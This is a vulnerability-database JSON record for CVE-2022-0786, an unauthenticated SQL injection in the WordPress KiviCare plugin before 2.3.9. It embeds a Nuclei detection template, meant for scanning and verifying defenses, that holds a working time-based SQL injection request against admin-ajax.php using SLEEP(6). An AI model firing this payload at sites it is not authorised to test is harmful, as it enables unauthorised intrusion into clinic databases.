{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-0786/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-0786/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-0786/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-0786/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-0786/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-0786"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-0786"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-0786.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2022-0786\n\ninfo:\n  name: WordPress KiviCare <2.3.9 - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.\n  remediation: |\n    Update to the latest version of the KiviCare plugin (2.3.9) or apply the provided patch to fix the SQL Injection vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30\n    - https://wordpress.org/plugins/kivicare-clinic-management-system/\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-0786\n    - https://github.com/20142995/sectool\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-0786\n    cwe-id: CWE-89\n    epss-score: 0.13271\n    epss-percentile: 0.96214\n    cpe: cpe:2.3:a:iqonic:kivicare:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: iqonic\n    product: kivicare\n    framework: wordpress\n  tags: time-based-sqli,cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 10s\n        GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=6'\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/html\")'\n          - 'contains(body, \"Doctor details\")'\n        condition: and\n# digest: 4a0a00473045022100e304f3acb3d504c934f3c671fca18b83c2af3d2baca57afa9d641695e9305d320220385877ce9b6515783e354006a35dc038ba0eeddd58337f8355e23ffc039780c3:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-0786"
}